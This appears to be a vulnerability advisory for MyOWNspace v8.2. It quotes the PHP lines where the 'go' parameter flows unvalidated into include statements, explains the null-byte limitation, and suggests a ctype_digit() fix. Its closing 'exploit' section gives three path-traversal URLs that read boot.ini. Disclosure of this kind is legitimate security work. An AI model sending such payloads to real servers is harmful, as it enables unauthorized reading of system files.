===========================================================================
( #Topic: MyOWNspace_v8.2
( #Bug type : multiple local file inclusion
( #Download : http://sourceforge.net/project/platformdownload.php?group_id=174729
( #Advisory :
===========================================================================
( #Author : ItSecTeam
( #Email: Bug@ITSecTeam.com
( #Website: http://www.itsecteam.com
( #Forum: http://forum.ITSecTeam.com
( #discovered by : ahmadbady

vuls:===================================================================
path/graph.php

if (isset($_GET['go'])) {$go=$_GET['go'];      line 28
$i=$go;                                        line 30
. . .
$friends="myownfriends/friends.".$i.".php";    line 38
include $friends;                              line 39
. . . . .
$friends="myownfriends/friends.".$i.".php";    line 74
include $friends;                              line 75
---------------------------------------------------------------------------
path/myowngraph.php
error graph.php line 39;

if (isset($_GET['go'])) {$go=$_GET['go'];      line 28
$i=$go;                                        line 29
include $friends;                              line 39
---------------------------------------------------------------------------
path/showmyownfriends.php

$conf_file="myownfriends/friends.".$_GET['go'].".php";    line 3
include $conf_file;                                       line 17
---------------------------------------------------------------------------
note: in all three files the go request parameter is concatenated into the
include path with no validation, so ../ sequences leave myownfriends/.
The %00 suffix used below drops the appended ".php" only on PHP older than
5.3.4, which is when PHP began rejecting NUL bytes in file paths; upgrading
PHP alone leaves the unvalidated include in place.
fix: if go is meant to be a numeric index (the variable name $i suggests
this, to be confirmed against the application), accept it only when
ctype_digit() passes before the path is built.
---------------------------------------------------------------------------
exploit:===================================================================
path/graph.php?go=../../../../../../../boot.ini%00
path/myowngraph.php?go=../../../../../../../boot.ini%00
path/showmyownfriends.php?go=../../../../../../../boot.ini%00
---------------------------------------------------------------------------